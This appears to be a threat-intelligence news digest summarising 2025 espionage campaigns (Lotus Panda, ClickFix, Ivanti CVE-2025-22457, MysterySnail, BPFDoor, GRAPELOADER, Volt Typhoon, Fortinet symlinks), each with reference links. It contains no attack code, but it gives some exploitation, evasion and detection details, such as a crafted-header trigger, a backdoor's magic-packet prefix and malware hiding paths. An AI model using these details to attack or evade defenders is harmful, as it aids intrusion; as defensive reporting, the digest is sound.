info@thehackernews.com (The@The Hacker News
//
A China-linked cyber espionage group known as Lotus Panda, also referred to as Billbug, has been actively targeting organizations in Southeast Asia. The campaign, which ran from August 2024 to February 2025, compromised entities within a single Southeast Asian country. Targeted sectors included government, critical infrastructure, and media, highlighting the group's broad espionage objectives. The attacks leveraged novel tools, including loaders, credential stealers, and a reverse SSH tool, showcasing the group's advanced capabilities and adaptability.
The intrusions involved the deployment of legitimate software from Trend Micro and Bitdefender to facilitate malicious DLL sideloading. Specifically, attackers misused Trend Micro's "tmdbglog.exe" and Bitdefender's "bds.exe" to load malicious DLL files, a technique known as DLL sideloading. These DLLs then decrypted and executed further payloads, allowing the attackers to gain a foothold in the targeted systems. The use of trusted software to deliver malware demonstrates a sophisticated approach aimed at evading detection.
Aside from using sideloading techniques, Lotus Panda also employed custom tools, including ChromeKatz and CredentialKatz stealers, along with a reverse SSH tool. The group is known for using the Sagerunex backdoor, which was detected in previous attacks against Asian organizations. These findings highlight the evolving tactics of state-sponsored threat actors and the persistent cyber pressure faced by nations in Southeast Asia. The attacks targeted a government ministry, an air traffic control organization, a telecommunications provider, a construction company, a news agency, and an air freight organization.
Recommended read:
References :
- www.scworld.com: Southeast Asia subjected to Lotus Panda attack campaign
- The Hacker News: Lotus Panda Hacks SE Asian Governments With Browser Stealers and Sideloaded Malware
- eSecurity Planet: Lotus Panda Hackers Strike Southeast Asian Governments With Browser Stealers, Sideloaded Malware
- www.esecurityplanet.com: Lotus Panda Hackers Strike Southeast Asian Governments With Browser Stealers, Sideloaded Malware
- Industrial Cyber: Billbug espionage group targets government, critical sectors in coordinated Southeast Asia cyber intrusion campaign
- Broadcom Software Blogs: 🚩 Lotus Panda Targets SE Asian Governments Using DLL Sideloading and Browser Stealers
- socprime.com: Billbug Attack Detection: China-Linked Espionage Actors Target Southeast Asian Organizations
- therecord.media: Research on China-linked hacking groups targeting Southeast Asian organizations.
@gbhackers.com
//
State-sponsored hacking groups from North Korea, Iran, and Russia are now widely employing the ClickFix social engineering tactic in their espionage campaigns. This technique, previously associated with cybercriminals, involves tricking users into copying, pasting, and running malicious commands, often through fake error messages and instructions. Proofpoint researchers first documented this shift over a three-month period from late 2024 to early 2025, noting that ClickFix has become an effective means of bypassing traditional security measures. This tactic replaces installation and execution stages in existing infection chains.
The adoption of ClickFix has been observed in various campaigns, each tailored to the specific objectives and targets of the respective state-sponsored actors. For instance, the North Korean actor TA427, also known as Kimsuky, utilized ClickFix in phishing campaigns targeting think tanks involved in North Korean affairs. By impersonating diplomatic personnel and leveraging spoofed document sharing platforms, TA427 successfully deployed the Quasar RAT, a remote access trojan. Meanwhile, Iranian group TA450 (MuddyWater) targeted organizations in the Middle East by masquerading as Microsoft security updates, deploying remote management tools for espionage and data exfiltration.
Russian-linked groups, including UNK_RemoteRogue and TA422 (APT28), have also experimented with ClickFix, indicating its growing appeal across different nation-state actors. The simplicity and effectiveness of ClickFix, which relies on user interaction rather than sophisticated technical exploits, makes it a valuable tool for these groups. While not all groups have persistently used ClickFix after initial tests, its adoption by multiple state-sponsored actors underscores the evolving threat landscape and the need for heightened vigilance against social engineering tactics. This trend suggests that ClickFix, and similar user-interactive attack methods, will continue to pose a significant threat in the future.
Recommended read:
References :
- gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
- The Hacker News: Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware
- www.scworld.com: Attacks leveraging the ClickFix social engineering technique have been increasingly conducted by state-backed threat operations to facilitate malware infections over the past few months, reports The Hacker News.
- www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
- cyberpress.org: State-Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
- cybersecuritynews.com: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
- Cyber Security News: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
- gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
- Cyber Security News: State Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
- www.techradar.com: State-sponsored actors spotted using ClickFix hacking tool developed by criminals
- BleepingComputer: ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks.
- securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- hackread.com: State-Backed Hackers from North Korea, Iran and Russia Use ClickFix in New Espionage Campaigns
- hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
- www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
- sra.io: Beware of ClickFix: A Growing Social Engineering Threat
- The DefendOps Diaries: The Rise of ClickFix: A New Social Engineering Threat
- Anonymous ???????? :af:: ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.
- Know Your Adversary: 112. State-Sponsored Threat Actors Adopted ClickFix Technique
sila.ozeren@picussecurity.com (Sıla@Resources-2
//
A Chinese cyber-espionage group, identified as UNC5221, is actively exploiting a zero-day vulnerability, CVE-2025-22457, in Ivanti Connect Secure. UNC5221 is suspected to be a China-nexus cyber-espionage group known for aggressively targeting edge network devices, such as VPNs, firewalls, and routers, with zero-day exploits since at least 2023. This vulnerability allows for unauthenticated remote code execution, giving attackers the ability to gain unauthorized access to organizations’ networks. The group has a history of quickly leveraging new flaws in Ivanti's Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances.
The latest campaign, launched in mid-March 2025, involves deploying the BRICKSTORM backdoor in targeted cyberespionage campaigns across Europe, including U.S.-based targets. This backdoor has evolved, with the Windows version now leveraging network tunneling capabilities and valid credentials to compromise Remote Desktop Protocol and Server Message Block, unlike the original Linux-targeting payload. The campaign is part of a broader trend of Chinese state-sponsored attackers focusing on internet-facing infrastructure for espionage, impacting government and enterprise networks globally.
Ivanti released a patch for CVE-2025-22457 on April 3, 2025, which affects Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways. The vulnerability is a stack-based buffer overflow that can be exploited by sending a crafted HTTP request with an overly long X-Forwarded-For header. CISA has added the CVE to its Known Exploited Vulnerabilities (KEV) catalog and recommends immediate action. Organizations using vulnerable Ivanti devices are strongly advised to apply the patch immediately and continuously monitor their external attack surface.
Recommended read:
References :
- watchTowr Labs: Watchtowr description
- Resources-2: Who Is the China-Nexus Group UNC5221? UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023 .
- www.scworld.com: Organizations across Europe are having their Windows systems compromised with the BRICKSTORM backdoor linked to Chinese state-backed threat operation UNC5221 as part of a cyberespionage campaign that commenced three years ago, Infosecurity Magazine reports.
- blog.criminalip.io: Response Strategy for Ivanti VPN Vulnerability CVE-2025-22457: CTI-Based Attack Surface Detection
@poliverso.org
//
Chinese-speaking IronHusky hackers are actively targeting government organizations in Russia and Mongolia using an upgraded version of the MysterySnail remote access trojan (RAT) malware. Security researchers at Kaspersky's Global Research and Analysis Team (GReAT) recently discovered this updated implant during investigations into attacks utilizing a malicious MMC script disguised as a Word document. This script downloads second-stage payloads and establishes persistence on compromised systems, indicating a continued focus on espionage and data theft by the APT group.
This new version of MysterySnail RAT includes an intermediary backdoor that facilitates file transfers between command and control servers and infected devices, allowing attackers to execute commands. The IronHusky group is abusing the legitimate piping server (ppng[.]io) to request commands and send back their execution results. This technique helps the attackers to evade detection by blending malicious traffic with normal network activity, highlighting the sophisticated methods employed by the threat actor.
The MysterySnail RAT, initially discovered in 2021, has undergone significant evolution, demonstrating its adaptability and the persistent threat it poses. Despite a period of relative obscurity after initial reports, the RAT has re-emerged with updated capabilities targeting specific geopolitical interests. The continuous refinement and deployment of this malware underscores the ongoing cyber espionage activities carried out by the IronHusky APT group, with a particular focus on Russian and Mongolian government entities.
Recommended read:
References :
- Securelist: MysterySnail RAT attributed to IronHusky APT group hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
- The DefendOps Diaries: The MysterySnail RAT: An Evolving Cyber Threat
- BleepingComputer: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
- Know Your Adversary: 108. Hunting for Node.js Abuse
- bsky.app: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
- www.kaspersky.com: Provides threat intelligence about the IronHusky APT group.
- poliverso.org: IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
- threatmon.io: Threatpost reports on Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
- hackread.com: Kaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…
- securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
- securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
- Talkback Resources: The MysterySnail RAT, linked to Chinese IronHusky APT, has resurfaced targeting government entities in Mongolia and Russia with a new version capable of executing 40 commands for malicious activities and deploying a modified variant named MysteryMonoSnail.
- securityaffairs.com: Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
- securelist.com: Kaspersky report on IronHusky updates the forgotten MysterySnail RAT
- www.scworld.com: Stealthy multi-stage malware attack, updated MysterySnail RAT uncovered
- securityaffairs.com: Malicious payloads have been distributed as part of a new covert multi-stage intrusion while Chinese advanced persistent threat operation IronHusky has been targeting Russian and Mongolian government entities with an upgraded MysterySnail RAT variant, reports The Hacker News.
Anna Ribeiro@Industrial Cyber
//
Trend Micro researchers have uncovered a novel controller linked to the BPFDoor backdoor, enabling stealthy reverse shell attacks on Linux servers across Asia and the Middle East. This previously unseen controller is attributed to the Red Menshen advanced persistent threat (APT) group, tracked by Trend Micro as Earth Bluecrow. The attacks, observed in the telecommunications, finance, and retail sectors, have been documented in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt. This discovery highlights the ongoing cyberespionage activities leveraging sophisticated and evasive techniques to compromise Linux systems.
The controller's primary function is to open a reverse shell on compromised systems, which allows attackers to move laterally within the network, control additional systems, and access sensitive data. BPFDoor uses the packet filtering features of Berkeley Packet Filtering (BPF) to inspect network packets, using "magic sequences" to activate the backdoor. This method allows BPFDoor to evade traditional security measures, making it a perfect tool for long-term espionage, as casual security sweeps won’t detect anything unusual. The malware can also change process names and does not listen to any port, further masking its presence.
Trend Micro's investigation indicates that BPFDoor has been active since at least 2021, with consistent campaigns targeting Linux servers across multiple industries. The attackers are known to hide malware in non-standard paths, such as /tmp/zabbix_agent.log or /bin/vmtoolsdsrv. Defenders are advised to monitor for TCP packets starting with 0x5293, followed by IP:port and password and UDP/ICMP packets. While static indicators are unreliable due to customizable magic packets and varying passwords, proactive network monitoring and analysis of BPF code are crucial for protecting organizations against BPF-powered threats.
Recommended read:
References :
- securityonline.info: BPFDoor Backdoor Used in Asia, Middle East Cyberespionage
- Virus Bulletin: Trend Micro's Fernando Mercês writes about BPFDoor, a state-sponsored backdoor designed for cyberespionage activities targeting the telecommunications, finance and retail sectors across South Korea, Hong Kong, Myanmar, Malaysia and Egypt.
- www.trendmicro.com: BPFDoor’s new hidden controller emerges! Attackers can open reverse shells or direct port for stealth access on Linux servers.
- gbhackers.com: A new wave of cyber espionage attacks has brought BPFDoor malware into the spotlight as a stealthy and dangerous tool for compromising networks.
- Cyber Security News: CybersecurityNews: Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks
- gbhackers.com: GBHackers: BPFDoor Malware Uses Reverse Shell to Expand Control Over Compromised Networks
- Industrial Cyber: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
- www.scworld.com: Novel BPFDoor backdoor component facilitates covert attacks
- Security Risk Advisors: 🚩 BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
- industrialcyber.co: Trend Micro details BPFDoor controller used in stealthy reverse shell attacks on telecom, finance, and retail
- sra.io: BPFDoor’s Hidden Controller Enables Stealthy Lateral Movement in Linux Server Attacks
- The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
- The Hacker News: New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
info@thehackernews.com (The@The Hacker News
//
APT29, a Russian state-sponsored hacking group also known as Cozy Bear or Midnight Blizzard, is actively targeting European diplomatic entities with a sophisticated phishing campaign that began in January 2025. The group is using deceptive emails disguised as invitations to wine-tasting events to entice recipients into downloading a malicious ZIP file. This archive, often named "wine.zip," contains a legitimate PowerPoint executable alongside malicious DLL files designed to compromise the victim's system. These campaigns appear to focus primarily on Ministries of Foreign Affairs, as well as other countries' embassies in Europe, with indications suggesting that diplomats based in the Middle East may also be targets.
The malicious ZIP archive contains a PowerPoint executable ("wine.exe") and two hidden DLL files. When the PowerPoint executable is run, it activates a previously unknown malware loader called GRAPELOADER through a technique known as DLL side-loading. GRAPELOADER then establishes persistence on the system by modifying the Windows Registry. It collects basic system information, such as username and computer name, and communicates with a command-and-control server to fetch additional malicious payloads. This technique allows the attackers to maintain access to the compromised systems.
GRAPELOADER distinguishes itself through its advanced stealth techniques, including masking strings in its code and only decrypting them briefly in memory before erasing them. This malware gains persistence by modifying the Windows registry’s Run key, ensuring that the "wine.exe" is executed automatically every time the system reboots. The ultimate goal of the campaign is to deliver a shellcode, with Check Point also identifying updated WINELOADER artifacts uploaded to the VirusTotal platform with compilation timestamps matching recent activity. The emails are sent from domains like bakenhof[.]com and silry[.]com.
Recommended read:
References :
- Check Point Blog: Details on APT29's updated phishing campaign targeting European diplomatic organizations. Focus on new malware and TTPs
- BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
- bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
- blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
- cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
- research.checkpoint.com: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
- Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
- The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
- iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
- cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
- www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
- www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
- Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
- Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
- securityonline.info: Sophisticated phishing campaign targeting European governments and diplomats, using a wine-themed approach
- securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
- : The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.
- Virus Bulletin: The campaign employs a new loader, called GRAPELOADER, which is downloaded via a link in the phishing email.
- The Hacker News: The Hacker News reports on APT29 targeting European diplomats with wine-themed phishing emails and the GrapeLoader malware.
- hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
- ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
- ciso2ciso.com: APT29 Targets European Diplomats with Wine-Themed Phishing
- hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
- thehackernews.com: The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER.
- www.techradar.com: European diplomats targeted by Russian phishing campaign promising fancy wine tasting
- Talkback Resources: Talkback.sh discusses APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures [mal]
- Talkback Resources: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats [social] [mal]
- ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
- securityaffairs.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
- eSecurity Planet: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
- www.esecurityplanet.com: Russian state-linked hacking group is ramping up its cyberattacks against diplomatic targets across Europe, using a new stealthy malware tool known as “GrapeLoader” to deliver malicious payloads through cleverly disguised phishing emails.
- Security Risk Advisors: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
- ciso2ciso.com: Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware – Source: securityaffairs.com
- ciso2ciso.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
- Talkback Resources: Russia-linked group APT29 used a phishing campaign with fake wine tasting invitations to target European embassies and Ministries of Foreign Affairs, deploying GrapeLoader and WineLoader malware to gather sensitive information and conduct cyber spying operations.
- Blog: Russian state-sponsored hacking group APT29, also known as Cozy Bear or Midnight Blizzard, has launched a sophisticated phishing campaign targeting European diplomatic entities. The attackers are using deceptive emails that mimic invitations to wine-tasting events, enticing recipients to download a malicious ZIP file named "wine.zip."
Dissent@DataBreaches.Net
//
China has accused the United States National Security Agency (NSA) of launching "advanced" cyberattacks during the Asian Winter Games in February 2025, targeting essential industries. Police in the northeastern city of Harbin have placed three alleged NSA agents on a wanted list, accusing them of attacking the Winter Games' event information system and key information infrastructure in Heilongjiang province, where Harbin is located. The named NSA agents are Katheryn A. Wilson, Robert J. Snelling, and Stephen W. Johnson, all allegedly members of the NSA's Tailored Access Operations (TAO) offensive cyber unit.
China Daily reports the TAO targeted systems used for registration, timekeeping, and competition entry at the Games, systems which store "vast amounts of sensitive personal data." The publication also stated the TAO appeared to be trying to implant backdoors and used multiple front organizations to purchase servers in Europe and Asia to conceal its tracks and acquire the tools used to breach Chinese systems. A joint report from China's computer emergency response centers (CERTs) stated that over 270,000 attacks on the Asian Winter Games were detected, with 170,000 allegedly launched by the US.
Chinese foreign ministry spokesperson Lin Jian condemned the alleged cyber activity, urging the U.S. to take a responsible attitude on cybersecurity issues and stop any attacks and "groundless vilification against China." Xinhua reported the agents repeatedly carried out cyber attacks on China’s critical information infrastructure and participated in cyber attacks on Huawei and other enterprises. Chinese law enforcement agencies are seeking information that could lead to the arrest of the three NSA operatives, though rewards were not disclosed.
Recommended read:
References :
- The Register - Security: China names alleged US snoops over Asian Winter Games attacks
- www.cybersecurity-insiders.com: China accuses US of launching advanced Cyber Attacks on its infrastructure
- CyberScoop: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
- DataBreaches.Net: China accuses US of launching ‘advanced’ cyberattacks, names alleged NSA agents
- www.scworld.com: China's allegation that NSA hacked Asian Winter Games draws suspicion
- cyberscoop.com: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
- PCMag UK security: Police in the Chinese city of Harbin say three NSA operatives disrupted the 2025 Asian Winter Games and hacked Huawei.
- : China accused the United States National Security Agency (NSA) on Tuesday of launching “advanced†cyberattacks during the Asian Winter Games in February, targeting essential industries.
- Metacurity: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
- www.metacurity.com: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
- www.dailymail.co.uk: China accuses US of launching 'advanced' cyberattacks, names alleged NSA agents
- sysdig.com: UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell
- aboutdfir.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure
@www.wsj.com
//
China has reportedly acknowledged its role in cyberattacks against U.S. critical infrastructure, specifically those attributed to the Volt Typhoon campaign. This admission occurred during a secret meeting with U.S. officials in December, according to SecurityWeek. U.S. officials noted that Volt Typhoon's actions, which involved infiltrating various industries' systems through zero-day exploits and other advanced tactics, were an attempt to deter U.S. support for Taiwan. Furthermore, cyberespionage by the Chinese state-backed Salt Typhoon group against U.S. telecommunications firms was also discussed, revealing the compromise of U.S. officials' communications.
These attacks are part of a broader pattern of Chinese state-backed hackers increasing their activity against infrastructure in the U.S., Europe, and the Asia-Pacific region. Recent intelligence indicates groups like Volt Typhoon and Salt Typhoon have infiltrated power grids, telecommunications networks, and transportation systems. Their apparent goal is to preposition for potential wartime disruption or coercive retaliation during periods of geopolitical tension. This approach involves installing dormant "logic bombs" designed to be triggered during a conflict or crisis, maintaining persistent access while minimizing detection risk.
The intensified cyber activities are viewed as a component of China's cyber-enabled irregular warfare strategy. Recent incidents include a power grid failure in Taiwan linked to a Volt Typhoon logic bomb, along with similar occurrences reported in European infrastructure. The attacks' sophistication lies in their "Living Off the Land" techniques, blending state-sponsored hacking with proxy groups and disinformation to achieve strategic objectives without triggering conventional military responses. Such actions, as analyzed by IT security professional Simone Kraus, raise concerns due to their potential for devastating real-world consequences if critical infrastructure is compromised.
Recommended read:
References :
- Sam Bent: In a closed-door Geneva summit, Chinese officials admitted—albeit indirectly—to orchestrating Volt Typhoon cyberattacks on US infrastructure. The move signals escalating covert conflict over Taiwan and exposes the US grid’s vulnerability to prolonged foreign infiltration.
- DataBreaches.Net: Chinese officials acknowledged in a secret December meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
- www.metacurity.com: China acknowledged US cyberattacks at a secret meeting, report
- WIRED: China Secretly (and Weirdly) Admits It Hacked US Infrastructure
- Risky Business Media: China privately admits to hacking American critical infrastructure, the US Treasury was compromised by password spraying, America will sign a global spyware agreement after all, and a Chinese APT is abusing the Windows Sandbox to hide its malware.
- securityaffairs.com: China admitted its role in Volt Typhoon cyberattacks on U.S. infrastructure, WSJ reports.
- The Register - Security: China reportedly admitted directing cyberattacks on US infrastructure at a meeting with their American counterparts, according to The Wall Street Journal.…
- Schneier on Security: China Sort of Admits to Being Behind Volt Typhoon
- oodaloop.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure: Report
- www.scworld.com: US critical infrastructure attacks reportedly acknowledged by China
- OODAloop: In a secret meeting that took place late last year between Chinese and American officials, the former confirmed that China had conducted cyberattacks against US infrastructure as part of the campaign known as Volt Typhoon, according to The Wall Street Journal.
- cybersecuritynews.com: Chinese Hackers Attacking Critical Infrastructure to Sabotage Networks
- Metacurity: China acknowledged US cyberattacks at a secret meeting, report
- ciso2ciso.com: China Sort of Admits to Being Behind Volt Typhoon – Source: www.schneier.com
- WIRED: Brass Typhoon: The Chinese Hacking Group Lurking in the Shadows
@www.bleepingcomputer.com
//
Over 16,000 Fortinet devices have been compromised due to a novel symlink backdoor, allowing attackers to maintain read-only access to sensitive files. This was reported by The Shadowserver Foundation. The attackers are exploiting known vulnerabilities in FortiGate devices, specifically targeting the SSL-VPN language file directory. By creating a symbolic link between the user filesystem and the root filesystem, attackers can bypass security measures and access critical files even after patches are applied.
Researchers observed that threat actors are leveraging a new method to exploit previously patched vulnerabilities in Fortinet's FortiOS, specifically targeting FortiGate VPN appliances. The original flaw, CVE-2023-27997, had a fix issued, but threat actors can still gain access by manipulating symbolic links during the device's boot process. This enables threat actors with prior access to maintain control over the device, even after firmware updates. The issue stems from how FortiOS handles file permissions and symlinks when restarting, allowing malicious files to persist and re-enable vulnerabilities that were supposedly fixed.
Fortinet has responded by releasing several updates and new security measures to block further attacks. These measures include launching an internal investigation, coordinating with third-party experts, and developing an AV/IPS signature to detect and remove the symbolic link automatically. Multiple updates have been issued across different FortiOS versions, including 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates not only remove the backdoor but also modify the SSL-VPN interface to prevent future occurrences. Organizations are urged to upgrade to the latest secure versions to mitigate the risk.
Recommended read:
References :
- www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
- thehackernews.com: The Hacker News article on Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
- community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
- BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
- BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
- Help Net Security: HelpNetSecurity: FortiOS, FortiGate vulnerabilities
- bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
- www.bleepingcomputer.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
- bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
- www.scworld.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
- securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
- hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
- www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
- The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
- MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
- hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
- securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
- ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
- securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
- ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access – Source:hackread.com
- Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
- BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
- bsky.app: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
- www.bleepingcomputer.com: Over 16,000 Fortinet devices compromised with symlink backdoor
- The DefendOps Diaries: Fortinet Devices Under Siege: Understanding the Symlink Backdoor Threat
- www.cybersecuritydive.com: Over 14K Fortinet devices compromised via new attack method
|
|